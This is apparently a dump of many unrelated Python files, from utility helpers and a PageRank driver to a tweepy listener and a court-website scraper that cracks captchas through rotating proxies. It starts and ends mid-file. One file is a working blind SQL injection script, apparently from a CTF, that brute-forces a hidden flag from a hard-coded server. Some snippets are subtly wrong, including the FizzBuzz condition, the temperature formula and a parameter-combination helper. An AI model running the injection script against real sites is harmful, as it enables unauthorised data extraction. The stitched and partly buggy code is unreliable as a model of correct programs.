for i in range(len(ar)-n):
liC1=liC.foreach(dicFunc[i])
iCNT=0
while not __checkNAry(liC1,ar[0:n+i+1]):
# liC1=list(map(dicFunc[i],liC))
liC1=liC.foreach(dicFunc[i])
iCNT+=1
if iCNT>30:
break
liC=liC1
return liC
def getNAryOuterProduct2Array(ar,n=2,condition=lambda x : True):
dic={}
length=len(ar)
listCombinations=[]
for i in range(len(ar)):
dic[i]=-ar[i]
liOrderedDim=[-v for (k,v) in sorted(dic.items(), key = lambda kv:(kv[1], kv[0]))]
liReordering=[k for (k,v) in sorted(dic.items(), key = lambda kv:(kv[1], kv[0]))]
listCombinations=__getNAryOuterProduct2Array(liOrderedDim,2)
listCombinations=map(lambda l:[l[i] for i in liReordering], listCombinations )
return list(filter(condition,listCombinations))
#endregion
def getRandomFractionalCombinatoric(ar,fraction=0.3,condition=lambda x : True):
listCombinations=getOuterProduct2Array(ar)
cnt=ceil(len(listCombinations)*fraction)
liRes=[]
while len(liRes)<=cnt :
en=randint(0,len(listCombinations)-1)
if not en in liRes:
liRes.append(en)
return list(filter(condition,[listCombinations[i] for i in liRes]))
# given some dictionary with tuple values (parameter combinatorics) the
# cartesian product of their tuple values is build
def getParameterCombinations(PARAMS,**kwargs):
defaultParameter={'combinatoric':'GridSearch','fraction':0.3,'n-ary':2,'condition':lambda x : True}
defaultParameter.update(kwargs)
liReturn=[]
dicComb={}
iarComb=[]
combinatorics=[]
i=0
for k in PARAMS.keys():
PARAMS[k]=[ o for o in PARAMS[k] if o is not None]
iarComb.append(len(PARAMS[k]))
dicComb[i]=k
i+=1
if defaultParameter['combinatoric'].upper().startswith('RANDOM'):
combinatorics=getRandomFractionalCombinatoric(iarComb,fraction=defaultParameter['fraction'])
elif defaultParameter['combinatoric'].upper().startswith('NARY'):
combinatorics=getNAryOuterProduct2Array(iarComb,n=defaultParameter['n-ary'])
elif defaultParameter['combinatoric'].upper().startswith('GRID') :
combinatorics=getOuterProduct2Array(iarComb)
for c in combinatorics:
i=0
params={}
for j in c:
k=dicComb[i]
params[k]=PARAMS[k][j]
i+=1
liReturn.append(params)
return list(filter(defaultParameter['condition'],liReturn))
# given several parameter dictionaries, the cartesian product of
# their combinatorical cartesian products is build
def getParameterArrayCombinations(PARAMS):
liComb=[]
if len(PARAMS)==1:
return getParameterCombinations(PARAMS[0])
elif len(PARAMS)==2:
for l1 in getParameterCombinations(PARAMS[0]):
for l2 in getParameterCombinations(PARAMS[1]):
l1.update(l2)
liComb.append(l1.copy())
return liComb
elif len(PARAMS)==3:
for l1 in getParameterCombinations(PARAMS[0]):
for l2 in getParameterCombinations(PARAMS[1]):
for l3 in getParameterCombinations(PARAMS[1]):
l1.update(l2.update(l3))
liComb.append(l1.copy())
return liComb
#endregion
#region filtering objects
def filterDictionary(dic,condition=lambda x,y : True):
return {key: value for (key, value) in dic.items() if condition(key,value)}
#endregion
#region (smooth) minimum
#%%
@tf.custom_gradient
def smoothMinimum(x,gamma=0.1):
min=np.min(x)
p=tf.cast((-x+min),tf.float64)/gamma
def grad(dx,gamma=0.1):
m=tf.minimum(x,10000)[0].numpy()
minIndex=tf.cast(tf.constant(x==m),tf.float64)
return tf.multiply(-minIndex,dx/tf.reduce_sum(minIndex)),0
return tf.Variable(-gamma*np.sum(np.exp(p))+min),grad
def grad_smoothMinimum(x,gamma=0.1):
with tf.GradientTape() as tape:
tape.watch(x)
value = smoothMinimum(x,gamma)
return tape.gradient(value, x)
@tf.custom_gradient
def Minimum(x):
def grad(dx):
return 1
return x[tf.argmin(x)],grad
def grad_Minimum(x):
with tf.GradientTape() as tape:
tape.watch(x)
value = Minimum(x)
return tape.gradient(value, x)
#endregion
#region binary encoding
# The function which converts an integer value to the binary value:
def binaryEncode(i):
return '{:064b}'.format(i)
# binary to integer
def binaryDecode(bi):
return sum([2**(63-i) for i in range(64) if bi[i]=='1'])
# combines several digital signal values to one integer value
def encodeSignalValues(sigValues):
return [sum([2**(len(sigValues)-1-i) for i in range(len(sigValues)) if sigValues[i] ==1 ])]
#decodes integer signal value in n digital signal values
def decodeSignalValues(sigValue,n):
lb='{:064b}'.format(sigValue)
return [ord(lb[i])-48 for i in range(64) if i>64-n]
# given 2 integer return the difference when readed as composed digital signal values
def binaryIntegerDifference(val1,val2):
if isinstance(val1,(list,np.ndarray)):
val1=val1[0]
if isinstance(val2,(list,np.ndarray)):
val2=val2[0]
return sum([1 for i in '{:064b}'.format(val1^val2) if i=='1'])
#endregion
#region method extensions
# Method Extension via decorator
def method_extension(cls):
def decorator(func):
setattr(cls, func.__name__, func)
return func
return decorator
# Method Extension via metaclass
def method_extension_class(name, bases, namespace):
assert len(bases) == 1, "Exactly one base class required"
base = bases[0]
for name, value in namespace.iteritems():
if name != "__metaclass__":
setattr(base, name, value)
return base
# class <newclass>(<someclass>):
# __metaclass__ = monkeypatch_class
# def <method1>(...): ...
# def <method2>(...): ...
# This adds <method1>, <method2>, etc. to <someclass>, and makes
# <newclass> a local alias for <someclass>.
#region list/ dictionary extensions
class List(list):
__metaclass__ = method_extension_class
def __init__(self, iterable):
super().__init__(iterable)
def lappend(self,a):
self.append(a)
return self
def foreach(self,func=lambda a:a):
return List([func(a) for a in self])
def __getitem__(self, item):
lc=self.copy()
if isinstance(item,slice):
return List(lc[item])
else:
return lc[item]
# class List(list):
# def __init__(self, iterable):
# super().__init__(iterable)
# @method_extension(List)
# def add(self,a):
# if not a in self:
# self.append(a)
# return self
# @method_extension(List)
# def lappend(self,a):
# self.append(a)
# return self
# @method_extension(List)
# def foreach(self,func=lambda a:a):
# return List([func(a) for a in self])
# @method_extension(List)
# def __getitem__(self,item):
# lc=self.copy()
# return List(lc[item])
class Dict(dict):
__metaclass__ = method_extension_class
def __init__(self,dic):
for k,v in dic.items():
self[k]=[v]
def __add(self,k,v):
if k in self.keys():
self[k].append(v)
else:
self[k]=[v]
def add(self,dic):
for k,v in dic.items():
self.__add(k,v)
#endregion
#endregion
#region experiments and tests
# #%%
# li=List([1,2,3,6,7,8,9])
# li1=li.lappend(4)
# isinstance(li1,List)
# print(li1)
# f=lambda l:List([l]).lappend(35)
# l2=li1.foreach(f)
# isinstance(l2,List)
# lis=List(li)
# print(lis.foreach(lambda a:2*a))
# l3=li[2:3]
# print(l3)
# dic={'a':1,'b':2}
# dic1=Dict({})
# dic1.add({'a':3})
# print(dic1)
# print(getNAryOuterProduct2Array([3,4,2,2]))
# # %%
# l=[13,25,2233,43628]
# for i in l:
# print(i)
# print(binaryEncode(i))
# print(binaryDecode(binaryEncode(i)))
# # %%
# l1=[1,1,0,0,0,1]
# l2=[0,1,0,0,1,1]
# d1=encodeSignalValues(l1)
# d2=encodeSignalValues(l2)
# print(d1)
# # print(d2)
# #%%
# dar=[2.0,4.0,2.0]
# p=np.array(dar)
# min=np.min(dar)
# min=(p==min).astype(int)
# print(np.sum(min))
# #%% # return -gamma * (log(tmp) + max_val)
# x=np.array(dar)
# print(smoothMinimum(x))
# print(grad_smoothMinimum(tf.Variable(x)))
# print(Minimum(x))
# print(grad_Minimum(tf.Variable(x)))
# #%%
# ind=np.array([1, 0, 0])
# p=np.array(dar)
# print(p*ind)
#endregion
# # %%
# import random
# ar=[]
# for i in range(1000):
# ar.append(random.randint(1,10000)*1.0)
# min1=min(ar)
# print(ar[tf.argmin(ar)])
# print(abs(min1))
# #%%
# print(Minimum(tf.Variable(ar)))
# print(grad_Minimum(tf.Variable(ar)))
# # print(grad_smoothMinimum(tf.Variable(ar)))
# #%%
|
'''
FizzBuzz challenge:
- For multiples of 3 print "Fizz"
- for multiples of 5 print "Buzz"
- If the number is a multiple of 3 and 5 print "FizzBuzz"
'''
class FizzBuzz:
def fizz_buzz(self, num):
if num % 3 and num % 5 == 0:
print("FizzBuzz")
elif num % 3 == 0:
print("Fizz")
elif num % 5 == 0:
print("Buzz")
fb = FizzBuzz()
fb.fizz_buzz(3)
fb.fizz_buzz(5)
fb.fizz_buzz(15)
|
# -*- coding:utf-8 -*-
__author__ = 'angelwhu'
import binascii
import requests
import sys
session = requests.Session()
def test(input):
url = "http://202.120.7.197/app.php?action=search&keyword=&order=if(" + input + ",name,price)"
print url
headers = {"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.5",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0",
"cookie":"PHPSESSID=0k3dt4k70kkabuha8s50hsnb83",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Connection": "keep-alive"}
response = session.get(url, headers=headers)
#print response.text
return ("\"id\":\"3\"" in response.text[:35])
def brute_force_expr(expr):
ch_i=1
ascii_i=40 #(
word = ""
while True:
found_char=False
while(ascii_i<=126): #~
#res = test("ascii(substring(("+expr+"),"+str(ch_i)+",1))="+str(ascii_i))
#test_char = "0x"+binascii.hexlify(chr(ascii_i))
#ascii(substring((select(select(flag)from(ce63e444b0d049e9c899c9a0336b3c59))),str(ch_i),1))like(test_char)
payload = "ascii(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),"+str(ch_i)+",1))like("+str(ascii_i)+")"
#print payload
res = test(payload)
if(res):
word += chr(ascii_i)
print "Found (",ch_i,") ",chr(ascii_i)," - ",word
found_char = True
break
ascii_i+=1
if(not found_char):
print "No char at index ",ch_i," .. ending string construction.."
break
ascii_i = 40
ch_i+=1
return word
print brute_force_expr(sys.argv[1]) #Replacement fix the spaces problem!
|
#!/usr/bin/python
from PageRankIter_W import PageRankIter_W
from PageRankDist_W import PageRankDist_W
from PageRankSort_W import PageRankSort_W
from helper import getCounter, getCounters
from subprocess import call, check_output
from time import time
import sys, getopt, datetime, os
# parse parameter
if __name__ == "__main__":
try:
opts, args = getopt.getopt(sys.argv[1:], "hg:j:i:")
except getopt.GetoptError:
print 'RunBFS.py -g <graph> -j <jump> -i <iteration> -d <index> -s <size>'
sys.exit(2)
if len(opts) != 3:
print 'RunBFS.py -g <graph> -j <jump> -i <iteration> -d <index>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'RunBFS.py -g <graph> -j <jump> -i <iteration> -d <index>'
sys.exit(2)
elif opt == '-g':
graph = arg
elif opt == '-j':
jump = arg
elif opt == '-i':
n_iter = arg
start = time()
FNULL = open(os.devnull, 'w')
n_iter = int(n_iter)
host = 'localhost'
print '%s: %s topic sensitive PageRanking on \'%s\' for %d iterations with damping factor %.2f ...' %(str(datetime.datetime.now()),
'start', graph[graph.rfind('/')+1:], n_iter, 1-float(jump))
# clear directory
print str(datetime.datetime.now()) + ': clearing directory ...'
call(['hdfs', 'dfs', '-rm', '-r', '/user/leiyang/in'], stdout=FNULL)
call(['hdfs', 'dfs', '-rm', '-r', '/user/leiyang/out'], stdout=FNULL)
call(['hdfs', 'dfs', '-cp', '/user/leiyang/wiki_topic', '/user/leiyang/in'])
# create iteration job
iter_job = PageRankIter_W(args=['hdfs:///user/leiyang/in/part*', '--n', '10',
'-r', 'hadoop', '--output-dir', 'hdfs:///user/leiyang/out'])
# run pageRank iteratively
iteration = 1
while(1):
print str(datetime.datetime.now()) + ': running iteration %d ...' %iteration
with iter_job.make_runner() as runner:
runner.run()
# check counters for topic loss mass
loss = getCounters('wiki_dangling_mass', host)
loss_array = ['0']*11
for k in loss:
i = int(k.split('_')[1])
loss_array[i] = str(loss[k]/1e10)
# move results for next iteration
call(['hdfs', 'dfs', '-rm', '-r', '/user/leiyang/in'], stdout=FNULL)
call(['hdfs', 'dfs', '-mv', '/user/leiyang/out', '/user/leiyang/in'])
# run redistribution job
loss_param = '[%s]' %(','.join(['0']*11) if len(loss)==0 else ','.join(loss_array))
dist_job = PageRankDist_W(args=['hdfs:///user/leiyang/in/part*', '--m', loss_param,
'-r', 'hadoop', '--output-dir', 'hdfs:///user/leiyang/out'])
print str(datetime.datetime.now()) + ': distributing loss mass ...'
with dist_job.make_runner() as runner:
runner.run()
if iteration == n_iter:
break
# if more iteration needed
iteration += 1
call(['hdfs', 'dfs', '-rm', '-r', '/user/leiyang/in'], stdout=FNULL)
call(['hdfs', 'dfs', '-mv', '/user/leiyang/out', '/user/leiyang/in'], stdout=FNULL)
# run sort job
print str(datetime.datetime.now()) + ': sorting PageRank ...'
call(['hdfs', 'dfs', '-rm', '-r', '/user/leiyang/rank'], stdout=FNULL)
sort_job = PageRankSort_W(args=['hdfs:///user/leiyang/out/part*',
'-r', 'hadoop', '--output-dir', 'hdfs:///user/leiyang/rank'])
with sort_job.make_runner() as runner:
runner.run()
print "%s: PageRank job completes in %.1f minutes!\n" %(str(datetime.datetime.now()), (time()-start)/60.0)
call(['hdfs', 'dfs', '-cat', '/user/leiyang/rank/p*'])
|
from django.core.cache import cache
from rest_framework import serializers
from thenewboston.constants.network import BALANCE_LOCK_LENGTH, VERIFY_KEY_LENGTH
from thenewboston.serializers.network_block import NetworkBlockSerializer
from v1.cache_tools.cache_keys import CONFIRMATION_BLOCK_QUEUE
from v1.tasks.confirmation_block_queue import process_confirmation_block_queue
class UpdatedBalanceSerializer(serializers.Serializer):
account_number = serializers.CharField(max_length=VERIFY_KEY_LENGTH)
balance = serializers.DecimalField(max_digits=32, decimal_places=16)
balance_lock = serializers.CharField(max_length=BALANCE_LOCK_LENGTH, required=False)
def create(self, validated_data):
pass
def update(self, instance, validated_data):
pass
class ConfirmationBlockSerializerCreate(serializers.Serializer):
block = NetworkBlockSerializer()
block_identifier = serializers.CharField(max_length=VERIFY_KEY_LENGTH)
updated_balances = UpdatedBalanceSerializer(many=True)
def create(self, validated_data):
"""
Add a confirmation block to the queue
"""
initial_data = self.initial_data
queue = cache.get(CONFIRMATION_BLOCK_QUEUE)
if queue:
queue.append(initial_data)
else:
queue = [initial_data]
cache.set(CONFIRMATION_BLOCK_QUEUE, queue, None)
process_confirmation_block_queue.delay()
return validated_data
def update(self, instance, validated_data):
pass
def validate(self, data):
"""
Check that confirmation block is unique (based on block_identifier)
"""
block_identifier = data['block_identifier']
confirmation_block_queue = cache.get(CONFIRMATION_BLOCK_QUEUE)
if confirmation_block_queue:
existing_block_identifiers = {i['block_identifier'] for i in confirmation_block_queue}
existing_confirmation_block = next(
(i for i in confirmation_block_queue if block_identifier in existing_block_identifiers),
None
)
if existing_confirmation_block:
raise serializers.ValidationError('Confirmation block with that block_identifier already exists')
return data
@staticmethod
def validate_updated_balances(updated_balances):
"""
Verify that only 1 updated balance includes a balance_lock (the sender)
"""
account_numbers = {i['account_number'] for i in updated_balances}
if len(account_numbers) != len(updated_balances):
raise serializers.ValidationError(
'Length of unique account numbers should match length of updated_balances'
)
balance_locks = [i['balance_lock'] for i in updated_balances if i.get('balance_lock')]
if len(balance_locks) != 1:
raise serializers.ValidationError('Should only contain 1 balance lock')
return updated_balances
|
from rest_framework import serializers
from .. import models
class ResourcesSerializer(serializers.ModelSerializer):
class Meta:
model = models.Resources
fields = ('money',
'hydrocarbon') |
# Longest Collatz sequence
'''
The following iterative sequence is defined for the set of positive integers:
n → n/2 (n is even)
n → 3n + 1 (n is odd)
Using the rule above and starting with 13, we generate the following sequence:
13 → 40 → 20 → 10 → 5 → 16 → 8 → 4 → 2 → 1
It can be seen that this sequence (starting at 13 and finishing at 1) contains 10 terms.
Although it has not been proved yet (Collatz Problem), it is thought that all starting numbers finish at 1.
Which starting number, under one million, produces the longest chain?
Note: Once the chain starts the terms are allowed to go above one million.
'''
# Answer = 837799
longest = 1
length = 1
x = 1
while x < 1000000:
n = x
collatz = 1
while n != 1:
if n%2 == 0:
n /= 2
else:
n = 3*n + 1
collatz += 1
if collatz > length:
length = collatz
longest = x
x += 1
print(longest) |
import tweepy
import time
from tweepy import OAuthHandler
from tweepy import Stream
from tweepy.streaming import StreamListener
import json
from http.client import IncompleteRead
import csv
consumer_key = None
consumer_secret = None
access_token = None
access_secret = None
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_secret)
api = tweepy.API(auth, timeout=90)
with open('result.csv', 'a') as csvdump:
wTweet = csv.writer(csvdump, delimiter=';')
class Listener(StreamListener):
def on_status(self, status):
if status.lang == 'en':
print(status.text)
with open("UTWriter.txt", "a", encoding='utf-8') as writer:
writer.write(status.text + "\n")
#def on_error(self, status):
# print(status)
# return True
while True:
try:
twitter_stream = Stream(auth, Listener())
twitter_stream.sample()
except IncompleteRead:
pass
except KeyboardInterrupt:
twitter_stream.disconnect()
break
#finally: # Is this ok, may result in rate limiting?
# pass
def record_data(input):
for line in input:
with open("record_data", "w") as log:
log.write(line)
|
import matplotlib.pyplot as plt
import seaborn as sns
def plot_bar(data, x, y, title, label_x_axis='', label_y_axis='', with_annotation=True, save_as=''):
sns.set_style('whitegrid')
bar,ax = plt.subplots(figsize=(10,6))
ax = sns.barplot(x=x, y=y, data=data, ci=None, palette='muted',orient='v', )
ax.set_title(title, fontsize=18)
ax.set_xlabel (label_x_axis)
ax.set_ylabel (label_y_axis)
if with_annotation:
for p in ax.patches:
ax.annotate(format(p.get_height(), '.0f'), (p.get_x() + p.get_width() / 2., p.get_height()), ha = 'center', va = 'center', xytext = (0, 5), textcoords = 'offset points')
if not (save_as == ''):
bar.savefig(save_as); |
# tuple data structure
# tuples can store any data type
# most imporatant is tuples are immuatable, it cant be changed once created
# example = ('one','two','three')
# # no append, no insert , no pop, no remove
# For better practice, should be used only if we know, data is not going to change
# Why to use tuples:
# faster than lists
# Methods
# count, index
# len function
# slicing
|
from collections import Counter
def calculate_gc_content(sequence):
"""
Receives a DNA sequence (A, G, C, or T)
Returns the percentage of GC content (rounded to the last two digits)
"""
joined = "".join(sequence.lower())
count = Counter(joined)
return round((count['g'] + count['c']) / (count['g'] + count['c'] + count['t'] + count['a'])*100,2)
pass |
import random
from prefect.utilities.annotations import unmapped
class TestUnmapped:
def test_always_returns_same_value(self):
thing = unmapped("hello")
for _ in range(10):
assert thing[random.randint(0, 100)] == "hello"
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@copyright: icekredit Tech, LTD
file_name:guang_dong_fa_yuan_wang.py
description: 广东法院网
author:crazy_jacky
version: 1.0
date:2018/9/19
"""
import re
import time
import json
import traceback
from lxml import etree
from ics.utils import get_ics_logger
from ics.utils.exception_util import LogicException
from ics.crawler.ktgg.core.constant import TASK_STATUS
from ics.captcha.chaojiying.crack_captch import CjyCaptcha
from ics.crawler.ktgg.core.iter_page_base import KtggIterPageBase
from ics.http.http_downloader import Downloader, HEADERS_MODEL, PROXY_STRATEGY
class GuangDongFaYuanWang(KtggIterPageBase):
"""
广东法院网
"""
domain = 'www.gdcourts.gov.cn'
ename = 'guang_dong_fa_yuan_wang'
cname = u'广东法院网'
developer = u'郑淇鹏'
header = {'Accept': 'application/json,text/javascript,*/*;q=0.01',
'Accept-Encoding': 'gzip,deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'keep-alive',
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'Host': 'www.gdcourts.gov.cn',
'Origin': 'http://www.gdcourts.gov.cn',
'Referer': 'http://www.gdcourts.gov.cn/web/search?action=gotoajxxcx&ajlx=sp&flag=first',
'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36('
'KHTML,likeGecko)Chrome/69.0.3497.100Safari/537.36',
'X-Requested-With': 'XMLHttpRequest'}
start_url = 'http://www.gdcourts.gov.cn/web/search?action=gotoajxxcx&ajlx=sp&flag=first'
form_data = {"ajlx": "sp",
"fjm": "J00",
"pageNum": '',
"dsr": "",
"ah": "",
"csToken": '',
"page_randomcode": '',
"page_randomcode_submit": ''
}
def __init__(self, logger, seed_dict):
self.logger = logger or get_ics_logger(self.ename)
self.seed_dict = seed_dict
self.status = None
self.captcha = CjyCaptcha(self.logger)
self.downloader = Downloader(
logger=self.logger,
use_proxy=True,
proxy_mode='dly',
session_keep=True,
headers_mode=HEADERS_MODEL.OVERRIDE,
proxy_strategy=PROXY_STRATEGY.SWITCH_USE,
)
super(GuangDongFaYuanWang, self).__init__(self.seed_dict, self.logger)
def get_total_page(self):
try:
header = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip,deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'keep-alive',
'Host': 'www.gdcourts.gov.cn',
'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36('
'KHTML,likeGecko)Chrome/69.0.3497.100Safari/537.36',
'Upgrade-Insecure-Requests': '1',
}
resp = self.downloader.get(self.start_url, headers=header)
if not resp:
err_msg = u'下载列表页码resp为False'
self.logger.warning(err_msg)
raise LogicException(err_msg)
page_cnt = re.findall('"bsumpage">(\d+)<', resp.content, flags=re.S)
token_key = re.findall('{"tokenKey":"(\d+)"}', resp.content, flags=re.S)
if not page_cnt:
err_msg = u'下载列表页获取到的页面,提取不到总页码,请检查列表页html是否正确'
self.logger.warning(err_msg + ':{}'.format(resp.text))
raise LogicException(err_msg)
self.form_data.update({'token_key': token_key[0]})
return int(page_cnt[0])
except Exception:
err_msg = u'下载列表页码失败:{}'.format(traceback.format_exc())
self.logger.error(err_msg)
raise LogicException(err_msg)
def update_form_data(self, page):
try:
timespan = str(time.time()).replace('.', '')
url = 'http://www.gdcourts.gov.cn/common/random_codeById/{}-'.format(timespan)
header = {'Accept': 'image/webp,image/apng,image/*,*/*;q=0.8',
'Accept-Encoding': 'gzip,deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'keep-alive',
'Host': 'www.gdcourts.gov.cn',
'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36('
'KHTML,likeGecko)Chrome/69.0.3497.100Safari/537.36',
'Referer': 'http://www.gdcourts.gov.cn/web/search?action=gotoajxxcx&ajlx=sp&flag=first',
}
pic_cont = self.downloader.get(url, headers=header)
code, report_id = self.captcha.crack_captcha(pic_cont.content, yzm_dir='gdcourts')
url = 'http://www.gdcourts.gov.cn/common/getToKenTempPutCk'
form_data = {'tokenKey': self.form_data['token_key']}
token_cont = self.downloader.post(url, data=form_data, headers=self.header)
token = token_cont.json().get('tokenVal')
self.form_data.update({
"pageNum": page,
"csToken": token,
"page_randomcode": code,
"page_randomcode_submit": timespan
})
except Exception:
err_msg = u'更新form_data失败:{}'.format(traceback.format_exc())
self.logger.error(err_msg)
raise LogicException(err_msg)
def iter_page_list(self, total_page):
if total_page == 0:
self.logger.info(u'总页码为 total_page: {}, 无此记录'.format(total_page))
self.status = TASK_STATUS.NO_RECORD.value
else:
post_url = 'http://www.gdcourts.gov.cn/web/search?action=gotoajxxcx'
detail_url = 'http://www.gdcourts.gov.cn/web/search?action=ajxxxq&ajid={}%20&ah=&dsr=&pageNum=1'
for page in range(1, total_page + 1): # TODO just for test
try:
self.update_form_data(page)
resp = self.downloader.post(post_url, headers=self.header, data=self.form_data)
data_dic_lst = resp.json().get('ajxxlist')
for item in data_dic_lst:
ajid = item.get('AJID')
url = detail_url.format(ajid)
self.get_detail_page(url)
except Exception:
err_msg = u'下载出错,页码:{}, url:{}, 原因:{}'.format(page, self.start_url.format(page),
traceback.format_exc())
self.logger.warning(err_msg)
raise LogicException(err_msg)
time.sleep(0.5)
def get_detail_page(self, url):
header = {'Accept': 'image/webp,image/apng,image/*,*/*;q=0.8',
'Accept-Encoding': 'gzip,deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'keep-alive',
'Host': 'www.gdcourts.gov.cn',
'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36('
'KHTML,likeGecko)Chrome/69.0.3497.100Safari/537.36',
}
try:
resp = self.downloader.get(url, headers=header)
if not resp:
err_msg = u'下载详情页码resp为False'
self.logger.warning(err_msg)
raise LogicException(err_msg)
html = resp.content
self.parse_per_page(html, url)
except Exception:
err_msg = u'下载详情出错 url:{}, 原因:{}'.format(url, traceback.format_exc())
self.logger.warning(err_msg)
raise LogicException(err_msg)
def parse_per_page(self, html, url):
try:
et = etree.HTML(html)
collection = []
print '*'*100
print et
print '*'*100
data_lst = et.xpath('.//div[@id="a1"]')
if not data_lst:
return collection
raw_id = self.ktgg_tool.insert_page_source(html, self.ename, self.cname, self.do_time)
self.logger.info(self.stat_dict)
case_number = ''.join(et.xpath('.//h2//text()')).strip()
data_lst = [item.xpath('string(.)').strip() for item in et.xpath('.//td')]
key = data_lst[::2]
val = data_lst[1::2]
data_dic = dict(zip(key, val))
court_room = data_dic.get(u'承办部门')
case_cause = data_dic.get(u'案由')
party = data_dic.get(u'当事人')
temp_lst = party.split()
prosecutor = temp_lst[0].strip(unicode('申请人:'))
defendant = temp_lst[1].strip(unicode('被申请人:'))
# party_parse = prosecutor + ', ' + defendant
court_date = data_dic.get(u'立案日期')
presiding_judge = data_dic.get(u'主审法官')
# doc = '{} {} {} {} {}'.format(case_number, case_cause, party, court_date, court_room)
data_dict = {
# 'date': self.do_time,
"case_number": case_number,
# "doc": doc,
"court_date": court_date,
# "doc_id": "{}_{}".format(case_number, court_date),
"case_cause": case_cause,
"domain": self.domain,
"ename": self.ename,
"cname": self.cname,
"prosecutor": prosecutor,
"defendant": defendant,
"court_room": court_room,
"presiding_judge": presiding_judge,
"province": u'广东',
"party": party,
# "party_parse": party_parse,
# "party_parse_flag": 0,
"url": url,
"raw_id": raw_id
}
unique_id = '{}_{}_{}'.format(self.ename, case_number, court_date)
self.ktgg_tool.insert_ktgg_data(data_dict, self.stat_dict, unique_id)
except Exception:
err_msg = u'保存数据出现异常url: {}'.format(url)
self.logger.error(err_msg)
raise LogicException(err_msg)
self.logger.info(u'保存{}数据完成'.format(url))
self.logger.info(self.stat_dict)
if __name__ == '__main__':
seed_dict = {'ename': None, 'is_increment': True, 'page': 1}
ins = GuangDongFaYuanWang(None, seed_dict)
a = ins.start()
print a
|
import csv
import numpy as np
import pandas as pd
from sklearn import preprocessing
from sklearn.feature_extraction import DictVectorizer
from sklearn.cross_validation import train_test_split
from sklearn import cross_validation
from sklearn.model_selection import cross_val_predict
from sklearn import tree
from sklearn.naive_bayes import GaussianNB
from sklearn.ensemble import RandomForestClassifier
from sklearn import svm
import datetime
import matplotlib.pyplot as plt
import matplotlib as mpl
import re
from IPython.display import Image
import os
import pydotplus
from sklearn.learning_curve import learning_curve
import pylab as pl
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import classification_report
from sklearn.metrics import roc_curve,auc,roc_auc_score
from sklearn.metrics import confusion_matrix
from sklearn import metrics
import seaborn as sns
import importlib,sys
from scipy import interp
from sklearn.grid_search import GridSearchCV
df=pd.read_csv('new_result.csv',encoding='utf-8-sig',dtype=object)
df=df.replace('0','')
df.to_csv("new_result.csv",header=True,index=False,encoding='utf-8')
#df=df.fillna('')
#label=df['Result']
#
#df1=df.drop('Result',axis=1)
#df2=df1.drop('Other_Info',axis=1)
#
#
#encoder=preprocessing.LabelEncoder()
#labels=encoder.fit_transform(label)
#
#featurelist=df2
#vec=DictVectorizer()
#featurelist=vec.fit_transform(featurelist.to_dict(orient='records')).toarray()
#data_train,data_test,target_train,target_test=train_test_split(featurelist,labels,test_size=0.25)
#
#
#estimators = {}
#estimators['forest_100'] = RandomForestClassifier(n_estimators =100,oob_score=True,random_state=2,max_features='auto',min_samples_leaf=2,n_jobs=-1,class_weight={0:.12,1:.88})
#
#parameters={'max_features': ['auto', 'sqrt', 'log2'],
# 'min_samples_leaf':[1,10],
# 'random_state':[1,],
# 'class_weight':[{1:m} for m in [0.7,0.9]]}
#gridsearch = GridSearchCV(estimators['forest_100'],param_grid=parameters,cv=10)
#gridsearch.fit(featurelist,labels)
#print (gridsearch.best_params_,gridsearch.best_score,gridsearch.best_estimator_)
|
from tkinter import *
from tkinter import messagebox
w=Tk()
w.geometry("400x300")
w.title("login")
w.config(bg="pink")
Label(text="username").grid(row=0,column=0)
username=Entry()
username.grid(row=0,column=1)
Label(text="password").grid(row=1,column=0)
password=Entry(show="*")
password.grid(row=1,column=1)
def login():
uname=username.get()
pwd=password.get()
f=open("admin.txt","r")
print(uname)
for i in f:
print(i.split(" ")[0])
if (i.split(" ")[0])==uname and pwd in i.split(" ")[1]:
messagebox.showinfo("login","authorized user")
break
else:
messagebox.showinfo("unauthorized user")
Button(text="login",command=login).grid(row=2,column=0,columnspan=2)
w.mainloop() |
import pandas as pd
from pyArango.connection import *
movies = pd.read_csv('http://bit.ly/imdbratings')
conn = Connection(username='root', password='1234')
db_filmes = conn["Filmes"]
col_filmes = db_filmes.createCollection(name="filmesAmericanos")
db_filmes['filmesAmericanos']
doc1 = db_filmes["filmesAmericanos"].createDocument()
doc1["_key"] = "um_filme_ruim"
doc1["Nome"] = "O pior filme da minha vida"
doc1["Ano"] = 2019
doc1.save()
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 14 10:03:29 2020
@author: user
"""
華氏溫度 = input("輸入華式溫度:")
攝氏溫度 = int(華氏溫度) * 5 / 9 - 32
print(攝氏溫度) |
"""1. 아래와 같이 숫자를 두번 물어보게 하고 ★을 출력해서 사각형을 만드시오
가로의 숫자를 입력하시오 :
세로의 숫자를 입력하시오 : """
import numpy as np
a= int(input('가로의 숫자를 입력하시오:'))
b= int(input('세로의 숫자를 입력하시오:'))
for i in range(b):
for j in range(a):
print('*', end='')
print()
|
#coding: utf-8
__author__ = 'lufee'
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
SECRET_KEY = os.environ.get('SECRET_KEY') or 'hard to guess string'
FLASKY_ADMIN = 'lufeewu@gmail.com' # 注册管理员的用户
FLASKY_POSTS_PER_PAGE = 20
@staticmethod
def init_app(app):
pass
class ProductionConfig(Config):
